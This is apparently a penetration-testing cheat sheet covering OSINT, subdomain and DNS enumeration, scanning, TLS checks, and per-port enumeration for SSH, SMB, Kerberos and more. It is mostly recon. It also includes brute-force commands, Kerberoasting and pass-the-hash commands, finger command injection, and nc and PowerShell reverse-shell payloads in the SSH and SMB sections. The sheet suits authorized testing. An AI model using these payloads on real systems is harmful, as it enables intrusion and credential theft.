https://hunter.io
https://snov.io/email-finder
https://app.snov.io/domain-search
https://hunter.io/

# https://github.com/sham00n/buster
buster -e target@example.com

# https://github.com/m4ll0k/Infoga
python infoga.py

# https://github.com/martinvigo/email2phonenumber
python email2phonenumber.py scrape -e target@email.com

# https://github.com/jkakavas/creepy/

# https://github.com/Josue87/EmailFinder
emailfinder -d domain.com

# https://github.com/laramies/theHarvester
python3 theHarvester.py -d domain.com -b "linkedin"

GIT tools

# https://github.com/obheda12/GitDorker
python3 GitDorker.py -tf TOKENSFILE -q tesla.com -d dorks/DORKFILE -o target

# https://github.com/dxa4481/truffleHog
trufflehog https://github.com/Plazmaz/leaky-repo
trufflehog --regex --entropy=False https://github.com/Plazmaz/leaky-repo

# https://github.com/eth0izzle/shhgit
shhgit --search-query AWS_ACCESS_KEY_ID=AKIA

# https://github.com/d1vious/git-wild-hunt
python git-wild-hunt.py -s "extension:json filename:creds language:JSON"

# https://shhgit.darkport.co.uk/

# GitLab (API token required)
# https://github.com/codeEmitter/token-hunter
./token-hunter.py -g 123456

Metadata

# https://github.com/Josue87/MetaFinder
metafinder -d "domain.com" -l 10 -go -bi -ba -o united

Social Media

# Twitter
# https://github.com/twintproject/twint
twint -u username

# Google account
# https://github.com/mxrch/ghunt
python hunt.py myemail@gmail.com

# Instagram
# https://github.com/th3unkn0n/osi.ig
python3 main.py -u username

# Public GDrive docs
https://www.dedigger.com/#gsc.tab=0

# Websites
emailrep.io # Accounts registered by email
tinfoleak.com # Twitter
mostwantedhf.info # Skype
searchmy.bio # Instagram
search.carrot2.org # Results grouped by topic
boardreader.com # forums
searchcode.com # search by code in repositories
swisscows.com # semantic search engine
publicwww.com # search by source page code
psbdmp.ws # search in pastebin
kribrum.io # social-media search engine
whatsmyname.app

Root domains

Basic

# https://github.com/OWASP/Amass 
amass intel -d domain.com -whois 

# Search on Google
https://google.com/search?q=united+airlines 

# Analyze owners on domainbigdata
https://iqwhois.com/

Reverse whois

https://viewdns.info/reversewhois/?q=United+Airlines
https://tools.whoisxmlapi.com/reverse-whois-search

ASN

https://bgp.he.net/search?search%5Bsearch%5D=united+airlines&commit=Search 
whois -h whois.radb.net -- '-i origin AS11535' | grep -Eo "([0-9.]+){4}/[0-9]+" | uniq 
whois -h whois.radb.net -- '-i origin AS20461' | grep -Eo "([0-9.]+){4}/[0-9]+" | uniq | mapcidr -silent | dnsx -ptr -resp-only -retry 3 -silent

Favicon

# https://github.com/pielco11/fav-up
python3 favUp.py -ff ~/favicon.ico --shodan-cli 

# https://github.com/devanshbatham/FavFreak
cat urls.txt | python3 favfreak.py 

# https://faviconhasher.herokuapp.com/

# https://www.shodan.io/search?query=http.favicon.hash%3A-382492124

# https://github.com/edoardottt/favirecon
favirecon -u https://target.com/ -v

Google Analytics ID

https://builtwith.com/relationships/united.com
https://builtwith.com/relationships/tag/UA-29214177
https://api.hackertarget.com/analyticslookup/?q=united.com
https://api.hackertarget.com/analyticslookup/?q=UA-16316580

DNS manual recon

dnsrecon -d www.example.com -a 
dnsrecon -d www.example.com -t axfr
dnsrecon -d 
dnsrecon -d www.example.com -D  -t brt

dig www.example.com + short
dig www.example.com MX
dig www.example.com NS
dig www.example.com> SOA
dig www.example.com ANY +noall +answer
dig -x www.example.com
dig -4 www.example.com (For IPv4)
dig -6 www.example.com (For IPv6)
dig www.example.com mx +noall +answer example.com ns +noall +answer
dig -t AXFR www.example.com
dig axfr @10.11.1.111 example.box

dnsenum 10.11.1.111

Reverse IP search

# Get domain from IP
# https://reverse-ip.whoisxmlapi.com/
# https://github.com/projectdiscovery/dnsx
cat ips.txt | dnsx -ptr -resp-only -silent -retry 3

TLD bruteforcing

# TLD bruteforcing tool
https://github.com/Sybil-Scan/TLDbrute

Subdomain Enum

Passive sources

# https://github.com/OWASP/Amass
# https://github.com/OWASP/Amass/blob/master/examples/config.ini
amass enum -passive -d domain.com

# https://github.com/projectdiscovery/subfinder
# https://github.com/projectdiscovery/subfinder#post-installation-instructions
subfinder -d domain.com -all -silent

# https://github.com/tomnomnom/assetfinder
assetfinder example.com

# https://github.com/tomnomnom/waybackurls
# https://github.com/tomnomnom/unfurl
echo domain.com | waybackurls | unfurl -u domains

# https://github.com/lc/gau
# https://github.com/tomnomnom/unfurl
gau --subs example.com | unfurl -u domains

## Cert Transparency
# https://certificate.transparency.dev/
# https://crt.sh/
# https://github.com/glebarez/cero
cero example.com
# https://github.com/UnaPibaGeek/ctfr
python3 ctfr.py -d domain.com

# https://github.com/gwen001/github-subdomains
github-subdomains -d example.com -t tokens.txt -o output.txt

# https://github.com/christophetd/censys-subdomain-finder
python3 censys-subdomain-finder.py example.com

# https://github.com/SmoZy92/Shodomain
python shodomain.py <SHODAN-API-KEY> example.com

# https://github.com/Cgboal/SonarSearch
crobat -s example.com

Active DNS resolution

# Generate custom resolvers list, always
# https://github.com/vortexau/dnsvalidator
dnsvalidator -tL https://public-dns.info/nameservers.txt -threads 200

# https://github.com/d3mondev/puredns
puredns resolve subdomains.txt -r ~/Tools/resolvers.txt

## BF
# https://github.com/d3mondev/puredns
puredns bruteforce ~/Tools/subdomains.txt united.com -r ~/Tools/resolvers.txt

# https://github.com/projectdiscovery/shuffledns
shuffledns -d example.com -list example-subdomains.txt -r resolvers.txt

Alterations and permutations

#https://github.com/Josue87/gotator
gotator -sub subdomains/subdomains.txt -perm permutations_list.txt -depth 1 -numbers 10 -mindup -adv -md

Crawling

# 1st resolve subdomains on valid websites
# https://github.com/projectdiscovery/httpx
cat subdomains.txt | httpx -follow-host-redirects -random-agent -status-code -silent -retries 2 -title -web-server -tech-detect -location -o webs_info.txt
# Clean output
cat webs_info.txt | cut -d ' ' -f1 | grep ".domain.com" | sort -u > websites.txt
# Crawl them
# https://github.com/jaeles-project/gospider
gospider -S websites.txt --js -t 20 -d 2 --sitemap --robots -w -r > urls.txt
# Clean output
# https://github.com/tomnomnom/unfurl
cat urls.txt | sed '/^.\{2048\}./d' | grep -Eo 'https?://[^ ]+' | sed 's/]$//' | unfurl -u domains | grep ".domain.com"

DNS records

# https://github.com/projectdiscovery/dnsx
dnsx -retry 3 -a -aaaa -cname -ns -ptr -mx -soa -resp -silent -l subdomains.txt

DNS wordlists

# https://gist.githubusercontent.com/six2dez/a307a04a222fab5a57466c51e1569acf/raw
# https://wordlists-cdn.assetnote.io/data/manual/best-dns-wordlist.txt
# https://gist.github.com/jhaddix/f64c97d0863a78454e44c2f7119c2a6a

Other techniques

Google Analytics ID

# https://github.com/Josue87/AnalyticsRelationships
cat subdomains.txt | analyticsrelationships

Subdomain discovery with Burp

Navigate through target main website with Burp:

• Without passive scanner
• Set forms auto submit
• Scope in advanced, any protocol and one keyword ("tesla")
• Last step, select all sitemap, Engagement Tools -> Analyze target

Subdomain Takeover

Explanation

1. Domain name (sub.example.com) uses a CNAME record for another domain (sub.example.com CNAME anotherdomain.com).
2. At some point, anotherdomain.com expires and is available for anyone's registration.
3. Since the CNAME record is not removed from the DNS zone of example.com, anyone who records anotherdomain.com has full control over sub.example.com until the DNS record is present.

Resources

https://0xpatrik.com/takeover-proofs/

https://github.com/EdOverflow/can-i-take-over-xyz

Webs recon

Resolution

# https://github.com/projectdiscovery/httpx
cat subdomains/subdomains.txt | httpx -follow-redirects -random-agent -status-code -silent -retries 2 -title -web-server -tech-detect -location -no-color -o websites.txt

WAF Checks

# https://github.com/EnableSecurity/wafw00f 
wafw00f -i websites.txt

# IP Wafs/CDN lists
https://github.com/MISP/misp-warninglists

CMS

# https://github.com/Tuhinshubhra/CMSeeK 
tr '\n' ',' < websites.txt > cms_test.txt 
python3 cmseek.py -l cms_test.txt --batch -r

Web screenshot

# https://github.com/sensepost/gowitness
gowitness file -f websites.txt 
gowitness report serve -D gowitness.sqlite3

Fuzzing

# https://github.com/ffuf/ffuf
ffuf -mc all -fc 404 -ac -sf -s -w wordlist.txt -u https://www.domain.com/FUZZ

URLs

URL extraction

# https://github.com/jaeles-project/gospider
gospider -S websites.txt --js -t 20 -d 2 --sitemap --robots -w -r > urls.txt

# https://github.com/lc/gau
 cat websites.txt | gau -subs 
 
 # https://github.com/tomnomnom/waybackurls 
 cat websites.txt | waybackurls 
 
 # https://github.com/gwen001/github-endpoints 
 github-endpoints -q -k -d united.com -t tokens_github.txt 
 
 # https://github.com/Josue87/roboxtractor 
 cat webs.txt | roboxtractor -m 1 -wb

Filtering

# https://github.com/tomnomnom/qsreplace
cat urls.txt | qsreplace -a

# https://github.com/s0md3v/uro 
cat urls.txt | uro

Patterns

# https://github.com/tomnomnom/gf 
# https://github.com/1ndianl33t/Gf-Patterns 
gf sqli urls.txt

JS

# https://github.com/w9w/JSA 
cat urls.txt | python3 jsa.py 

# https://github.com/lc/subjs 
cat js.txt | subjs | httpx 

# https://github.com/GerbenJavado/LinkFinder 
python3 linkfinder.py -d -i https://domain.com/whatever.js -o cli

Wordlists generation

# https://github.com/tomnomnom/unfurl 
cat urls.txt | unfurl -u keys 
cat urls.txt | unfurl -u values

Network Scanning

IP resolution

# https://github.com/Josue87/resolveDomains
resolveDomains -d subdomains.txt

Netdiscover

netdiscover -i eth0
netdiscover -r 10.11.1.1/24

Nmap

nmap -sn 10.11.1.1/24
nmap -sn 10.11.1.1-253
nmap -sn 10.11.1.*

NetBios

nbtscan -r 10.11.1.1/24

Ping Sweep - Bash

for i in {1..254} ;do (ping -c 1 172.21.10.$i | grep "bytes from" &) ;done

Ping Sweep - Windows

for /L %i in (1,1,255) do @ping -n 1 -w 200 172.21.10.%i > nul && echo 192.168.1.%i is up.

Host Scanning

nmap

# Fast simple scan
nmap 10.11.1.111

# Nmap ultra fast
nmap 10.11.1.111 --max-retries 1 --min-rate 1000

# Get open ports
nmap -p - -Pn -n 10.10.10.10

# Comprehensive fast and accurate
nmap --top-ports 200 -sV -n --max-retries 2 -Pn --open -iL ips.txt -oA portscan_active

# Get sV from ports
nmap -pXX,XX,XX,XX,XX -Pn -sV -n 10.10.10.10

# Full complete slow scan with output
nmap -v -A -p- -Pn --script vuln -oA full 10.11.1.111

# Network filtering evasion
nmap --source-port 53 -p 5555 10.11.1.111
    # If work, set IPTABLES to bind this port
    iptables -t nat -A POSTROUTING -d 10.11.1.111 -p tcp -j SNAT --to :53

# Scan for UDP
nmap 10.11.1.111 -sU
nmap -sU -F -Pn -v -d -sC -sV --open --reason -T5 10.11.1.111

# FW evasion
nmap -f <IP>
nmap --mtu 24 <IP>
nmap --data-length 30 <IP>
nmap --source-port 53 <IP>

# Nmap better speed flags
--max-rtt-timeout: Time response per probe
--script-timeout: Time response per script
--host-timeout: Time response for host
--open: Avoid detection if filtered or closed
--min-rate

shodan

# https://cli.shodan.io/
shodan host 151.101.1.68

Packet Scanning

tcpdump

tcpdump -i eth0
tcpdump -c -i eth0
tcpdump -A -i eth0
tcpdump -w 0001.pcap -i eth0
tcpdump -r 0001.pcap
tcpdump -n -i eth0
tcpdump -i eth0 port 22
tcpdump -i eth0 -src 172.21.10.X
tcpdump -i eth0 -dst 172.21.10.X

# Online service
https://packettotal.com/

Packet strings analyzer

# https://github.com/lgandx/PCredz
./Pcredz -f file-to-parse.pcap
./Pcredz -d /tmp/pcap-directory-to-parse/
./Pcredz -i eth0 -v

Files

Common

# Check real file type
file file.xxx

# Analyze strings
strings file.xxx
strings -a -n 15 file.xxx # Check the entire file and outputs strings longer than 15 chars

# Check embedded files
binwalk file.xxx # Check
binwalk -e file.xxx # Extract

# Check as binary file in hex
ghex file.xxx

# Check metadata
exiftool file.xxx

# Stego tool for multiple formats
wget https://embeddedsw.net/zip/OpenPuff_release.zip
unzip OpenPuff_release.zip -d ./OpenPuff
wine OpenPuff/OpenPuff_release/OpenPuff.exe

# Compressed files
fcrackzip file.zip
# https://github.com/priyankvadaliya/Zip-Cracker-
python zipcracker.py -f testfile.zip -d passwords.txt
python zipcracker.py -f testfile.zip -d passwords.txt -o extractdir

# Office documents
https://github.com/assafmo/xioc

# Zip files in website
pip install remotezip
# list contents of a remote zip file
remotezip -l "http://site/bigfile.zip"
# extract file.txt from a remote zip file
remotezip "http://site/bigfile.zip" "file.txt"

# Grep inside any files
# https://github.com/phiresky/ripgrep-all
rga "whatever" folder/

Disk files

# guestmount can mount any kind of disk file
sudo apt-get install libguestfs-tools
guestmount --add yourVirtualDisk.vhdx --inspector --ro /mnt/anydirectory

Audio

# Check spectrogram
wget https://code.soundsoftware.ac.uk/attachments/download/2561/sonic-visualiser_4.0_amd64.deb
dpkg -i sonic-visualiser_4.0_amd64.deb

# Check for Stego
hideme stego.mp3 -f && cat output.txt #AudioStego

Images

# Stego
wget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar
chmod +x stegsolve.jar
java -jar stegsolve.jar

# Stegpy
stegpy -p file.png

# Check png corrupted
pngcheck -v image.jpeg

# Check what kind of image is
identify -verbose image.jpeg

# Stegseek
# https://github.com/RickdeJager/stegseek
stegseek --seed file.jpg
stegseek file.jpg rockyou.txt 

SSL/TLS

DROWN

# Check for "SSLv2 supported"
nmap –p- –sV –sC example.com

TLS_FALLBACK_SCSV

# Check in the lower port
openssl s_client –tls1 -fallback_scsv -connect example.com:443
# - Response:
# tlsv1 alert inappropriate fallback:s3_pkt.c:1262:SSL alert number 86

BEAST

# TLSv1.0 and CBC ciphers
openssl s_client -[sslv3/tls1] -cipher CBC_CIPHER -connect example.com:443

LUCKY13

openssl s_client -cipher CBC_CIPHER -connect example.com:443

Sweet32

openssl s_client -cipher 3DES -connect example.com:443

Logjam

# Check the "Server Temp Key" response is bigger than 1024 (only in OpenSSL 1.0.2 or better)
openssl s_client -connect www.example.com:443 -cipher "EDH"

SSLv2 Support

# If is supported this will return the server certificate information if not, error
openssl s_client –ssl2 -connect example.com:443

SSLv3 Support

# If is supported this will return the server certificate information if not, error
openssl s_client -ssl3 -connect google.com:443

Cipher suites

# Cipher Suites
nmap --script ssl-enum-ciphers -p 443 example.com

# - Anon cypher (fail)
openssl s_client -cipher aNULL -connect example.com:443

# - DES Cipher (fail)
openssl s_client -cipher DES -connect example.com:443

# - 3DES Cipher (fail)
openssl s_client -cipher 3DES -connect example.com:443

# - Export Cipher (fail)
openssl s_client -cipher EXPORT -connect example.com:443

# - Low Cipher (fail)
openssl s_client -cipher LOW -connect example.com:443

# - RC4 Cipher (fail)
openssl s_client -cipher RC4 -connect example.com:443

# - NULL Cipher (fail)
openssl s_client -cipher NULL -connect example.com:443

# - Perfect Forward Secrecy Cipher (This should NOT fail):
openssl s_client -cipher EECDH, EDH NULL -connect example.com:443

Secure renegotiation

# Check secure renegotiation is not supported
# If not, send request in the renegotiation
# Once sent, if it's vulnerable it shouldn't return error
openssl s_client -connect example.com:443
HEAD / HTTP/1.0
R
# <Enter or Return key>

CRIME

# Check for "Compression: NONE"
openssl s_client -connect example.com:443

BREACH

# If the response contains encoded data, host is vulnerable
openssl s_client -connect example.com:443
GET / HTTP/1.1
Host: example.com
Accept-Encoding: compress, gzip

Heartbleed

# Heartbleed
nmap -p 443 --script ssl-heartbleed --script-args vulns.showall example.com

# Heartbleed checker oneliner from sites list
cat list.txt | while read line ; do echo "QUIT" | openssl s_client -connect $line:443 2>&1 | grep 'server extension "heartbeat" (id=15)' || echo $line: safe; done

Change cipher spec injection

nmap -p 443 --script ssl-ccs-injection example.com

Cipher order enforcement

# Choose a protocol and 2 different ciphers, one stronger than other
# Make 2 request with different cipher order anc check in the response if the cipher is the first of the request in both cases
nmap -p 443 --script ssl-enum-ciphers example.com
openssl s_client –tls1_2 –cipher ‘AES128-GCM-SHA256:AES128-SHA’ –connect contextis.co.uk:443
openssl s_client –tls1_2 –cipher ‘AES128-SHA:AES128-GCM-SHA256’ –connect contextis.co.uk:443

Ports

General

AIO Penetration Testing Methodology - 0DAYsecurity.com

Port 21 - FTP

nmap --script ftp-* -p 21 10.11.1.111

Port 22 - SSH

• If you have usernames test login with username:username
• Vulnerable Versions to user enum: <7.7

# Enum SSH
# Get version
nmap 10.11.1.1 -p22 -sV
# Get banner
nc 10.11.1.1 22
# Get login banner
ssh root@10.11.11.1
# Get algorythms supporteed
nmap -p22 10.11.1.1 --script ssh2-enum-algos
# Check weak keys
nmap-p22 10.2.1.1 --script ssh-hostkey --script-args ssh_hostkey=full
# Check auth methods
nmap -p22 10.11.1.1 --script ssh-auth-methods --script-args="ssh.user=admin"

# User can ask to execute a command right after authentication before it’s default command or shell is executed
$ ssh -v user@10.10.1.111 id
...
Password:
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to 10.10.1.111 ([10.10.1.1114]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
uid=1000(user) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
Bytes per second: sent 43133.4, received 44349.5
debug1: Exit status 0

# Check Auth Methods:
$ ssh -v 10.10.1.111
OpenSSH_8.1p1, OpenSSL 1.1.1d  10 Sep 2019
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive

# Force Auth Method:
$ ssh -v 10.10.1.111 -o PreferredAuthentications=password
...
debug1: Next authentication method: password

# BruteForce:
patator ssh_login host=10.11.1.111 port=22 user=root 0=/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt password=FILE0 -x ignore:mesg='Authentication failed.'
hydra -l user -P /usr/share/wordlists/password/rockyou.txt -e s ssh://10.10.1.111
medusa -h 10.10.1.111 -u user -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh
ncrack --user user -P /usr/share/wordlists/password/rockyou.txt ssh://10.10.1.111

# LibSSH Before 0.7.6 and 0.8.4 - LibSSH 0.7.6 / 0.8.4 - Unauthorized Access 
# Id
python /usr/share/exploitdb/exploits/linux/remote/46307.py 10.10.1.111 22 id
# Reverse
python /usr/share/exploitdb/exploits/linux/remote/46307.py 10.10.1.111 22 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.1.111 80 >/tmp/f"

# SSH FUZZ
# https://dl.packetstormsecurity.net/fuzzer/sshfuzz.txt

# cpan Net::SSH2
./sshfuzz.pl -H 10.10.1.111 -P 22 -u user -p user

use auxiliary/fuzzers/ssh/ssh_version_2

# SSH-AUDIT
# https://github.com/arthepsy/ssh-audit                     

# Enum users < 7.7:
# https://www.exploit-db.com/exploits/45233
https://github.com/CaioCGH/EP4-redes/blob/master/attacker/sshUsernameEnumExploit.py
python ssh_user_enum.py --port 2223 --userList /root/Downloads/users.txt IP 2>/dev/null | grep "is a"

# SSH Leaks:
https://shhgit.darkport.co.uk/

# SSH bruteforce
# https://github.com/kitabisa/ssb

Port 23 - Telnet

# Get banner
telnet 10.11.1.110
# Bruteforce password
patator telnet_login host=10.11.1.110 inputs='FILE0\nFILE1' 0=/root/Desktop/user.txt 1=/root/Desktop/pass.txt  persistent=0 prompt_re='Username: | Password:'

Port 25 - SMTP

nc -nvv 10.11.1.111 25
HELO foo

telnet 10.11.1.111 25
VRFY root

nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.11.1.111
smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t 10.11.1.111

# SMTP relay
msfconsole
use auxiliary/scanner/smtp/smtp_relay
set RHOSTS <IP or File>
set MAILFROM <PoC email address>
set MAILTO <your email address>
run

# Send email unauth:

MAIL FROM:admin@admin.com
RCPT TO:DestinationEmail@DestinationDomain.com
DATA
test

.

Receive:
250 OK

Port 43 - Whois

whois -h 10.10.1.111 -p 43 "domain.com"
echo "domain.com" | nc -vn 10.10.1.111 43
whois -h 10.10.1.111 -p 43 "a') or 1=1#"

Port 53 - DNS

# Transfer zone

dig AXFR domain.com @10.10.10.10
# dig +multi AXFR @ns1.insecuredns.com insecuredns.com
dnsrecon -t axfr -d domain
fierce -dns domain.com

Port 69 - UDP - TFTP

• Vulns tftp in server 1.3, 1.4, 1.9, 2.1, and a few more.
• Same checks as FTP Port 21.

nmap -p69 --script=tftp-enum.nse 10.11.1.111

Port 79 - Finger

nc -vn 10.11.1.111 79
echo "root" | nc -vn 10.11.1.111 79

# User enumeration
finger @10.11.1.111       #List users
finger admin@10.11.1.111  #Get info of user
finger user@10.11.1.111   #Get info of user

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Port 88 - Kerberos

Check Kerberos dedicated section

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" IP
use auxiliary/gather/kerberos_enumusers # MSF

# Check for Kerberoasting: 
GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip <IP> -format hashcat/john

# GetUserSPNs
ASREPRoast:
impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
impacket-GetUserSPNs <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

# Kerberoasting: 
impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file> 

# Overpass The Hash/Pass The Key (PTK):
python3 getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
python3 getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
python3 getTGT.py <domain_name>/<user_name>:[password]

# Using TGT key to excute remote commands from the following impacket scripts:

python3 psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python3 smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python3 wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

# https://www.tarlogic.com/blog/como-funciona-kerberos/
# https://www.tarlogic.com/blog/como-atacar-kerberos/

python kerbrute.py -dc-ip IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt

# https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/
# https://github.com/GhostPack/Rubeus
# https://github.com/fireeye/SSSDKCMExtractor
# https://gitlab.com/Zer1t0/cerbero

Port 110 - Pop3

telnet 10.11.1.111
USER pelle@10.11.1.111
PASS admin

# or:

USER pelle
PASS admin

# List all emails
list

# Retrieve email number 5, for example
retr 9

Port 111 - Rpcbind

rpcinfo -p 10.11.1.111
rpcclient -U "" 10.11.1.111
    srvinfo
    enumdomusers
    getdompwinfo
    querydominfo
    netshareenum
    netshareenumall

Port 135 - MSRPC

Some versions are vulnerable.

nmap 10.11.1.111 --script=msrpc-enum
msf > use exploit/windows/dcerpc/ms03_026_dcom

# Endpoint Mapper Service Discovery
use auxiliary/scanner/dcerpc/endpoint_mapper

#Hidden DCERPC Service Discovery
use auxiliary/scanner/dcerpc/hidden

# Remote Management Interface Discovery
use auxiliary/scanner/dcerpc/management

# DCERPC TCP Service Auditor
use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor

impacket-rpcdump

# Enum network interface
# https://github.com/mubix/IOXIDResolver

Port 139/445 - SMB

# Enum hostname
enum4linux -n 10.11.1.111
nmblookup -A 10.11.1.111
nmap --script=smb-enum* --script-args=unsafe=1 -T5 10.11.1.111

# Get Version
smbver.sh 10.11.1.111
Msfconsole;use scanner/smb/smb_version
ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]' 
smbclient -L \\\\10.11.1.111

# Get Shares
smbmap -H  10.11.1.111 -R 
echo exit | smbclient -L \\\\10.11.1.111
smbclient \\\\10.11.1.111\\
smbclient -L //10.11.1.111 -N
nmap --script smb-enum-shares -p139,445 -T4 -Pn 10.11.1.111
smbclient -L \\\\10.11.1.111\\
# If got error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED"
smbclient -L //10.11.1.111/ --option='client min protocol=NT1'

# Check null sessions
smbmap -H 10.11.1.111
rpcclient -U "" -N 10.11.1.111
smbclient //10.11.1.111/IPC$ -N

# Exploit null sessions
enum -s 10.11.1.111
enum -U 10.11.1.111
enum -P 10.11.1.111
enum4linux -a 10.11.1.111
#https://github.com/cddmp/enum4linux-ng/
enum4linux-ng.py 10.11.1.111 -A -C
/usr/share/doc/python3-impacket/examples/samrdump.py 10.11.1.111

# Connect to username shares
smbclient //10.11.1.111/share -U username

# Connect to share anonymously
smbclient \\\\10.11.1.111\\
smbclient //10.11.1.111/
smbclient //10.11.1.111/
smbclient //10.11.1.111/<""share name"">
rpcclient -U " " 10.11.1.111
rpcclient -U " " -N 10.11.1.111

# Check vulns
nmap --script smb-vuln* -p139,445 -T4 -Pn 10.11.1.111

# Multi exploits
msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost 10.11.1.111; run

# Bruteforce login
medusa -h 10.11.1.111 -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt 
nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt 10.11.1.111  -vvvv
nmap –script smb-brute 10.11.1.111

# nmap smb enum & vuln 
nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 10.11.1.111
nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445 10.11.1.111

# Mount smb volume linux
mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share

# rpcclient commands
rpcclient -U "" 10.11.1.111
    srvinfo
    enumdomusers
    getdompwinfo
    querydominfo
    netshareenum
    netshareenumall

# Run cmd over smb from linux
winexe -U username //10.11.1.111 "cmd.exe" --system

# smbmap
smbmap.py -H 10.11.1.111 -u administrator -p asdf1234 #Enum
smbmap.py -u username -p 'P@$$w0rd1234!' -d DOMAINNAME -x 'net group "Domain Admins" /domain' -H 10.11.1.111 #RCE
smbmap.py -H 10.11.1.111 -u username -p 'P@$$w0rd1234!' -L # Drive Listing
smbmap.py -u username -p 'P@$$w0rd1234!' -d ABC -H 10.11.1.111 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.X""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"' # Reverse Shell

# Check
\Policies\{REG}\MACHINE\Preferences\Groups\Groups.xml look for user&pass "gpp-decrypt "

# CrackMapExec
crackmapexec smb 10.55.100.0/23 -u LA-ITAdmin -H 573f6308519b3df23d9ae2137f549b15 --local
crackmapexec smb 10.55.100.0/23 -u LA-ITAdmin -H 573f6308519b3df23d9ae2137f549b15 --local --lsa

# Impacket
python3 samdump.py SMB 172.21.0.0

# Check for systems with SMB Signing not enabled
python3 RunFinger.py -i 172.21.0.0/24

Port 161/162 UDP - SNMP

nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes 10.11.1.111
nmap 10.11.1.111 -Pn -sU -p 161 --script=snmp-brute,snmp-hh3c-logins,snmp-info,snmp-interfaces,snmp-ios-config,snmp-netstat,snmp-processes,snmp-sysdescr,snmp-win32-services,snmp-win32-shares,snmp-win32-software,snmp-win32-users
snmp-check 10.11.1.111 -c public|private|community
snmpwalk -c public -v1 ipaddress 1
snmpwalk -c private -v1 ipaddress 1
snmpwalk -c manager -v1 ipaddress 1
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 172.21.0.X

# Impacket
python3 samdump.py SNMP 172.21.0.0 

# MSF aux modules
 auxiliary/scanner/misc/oki_scanner                                    
 auxiliary/scanner/snmp/aix_version                                   
